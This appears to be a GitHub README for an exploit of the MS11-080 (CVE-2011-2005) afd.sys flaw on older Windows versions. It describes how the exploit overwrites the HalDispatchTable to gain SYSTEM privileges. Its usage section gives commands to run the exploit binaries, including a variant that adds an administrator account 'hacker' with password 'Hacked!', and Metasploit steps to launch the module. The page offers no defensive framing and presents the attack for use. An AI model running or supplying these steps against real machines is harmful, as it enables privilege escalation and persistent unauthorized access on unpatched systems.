MS11-080

This module exploits a flaw in the AfdJoinLeaf function of the afd.
sys driver to overwrite data in kernel space. 
An address within the HalDispatchTable is overwritten 
and when triggered with a call to NtQueryIntervalProfile will execute shellcode. 
This module will elevate itself to SYSTEM, then inject the payload into another 
SYSTEM process before restoring it's own token to avoid causing system instability.

The exp was from @BHaFSec

Vulnerability reference:

MS11-080
CVE-2011-2005

Usage

+ c:\\> ms11-080.exe -O 2k3 
+ c:\\> ms11-080-AddUser.exe -O 2k3
+ [*] Adding Admin User:hacker Pass:Hacked!...

caidao add user
local

win7

load the module within the msf

msf

msf > use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf) > show targets
    ...targets...
msf exploit(ms11_080_afdjoinleaf) > set TARGET <target-id>
msf exploit(ms11_080_afdjoinleaf) > show options
    ...show and set options...
msf exploit(ms11_080_afdjoinleaf) > exploit

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

MS11-080

Usage

load the module within the msf

Files

README.md

Latest commit

History

README.md

File metadata and controls

MS11-080

Usage

load the module within the msf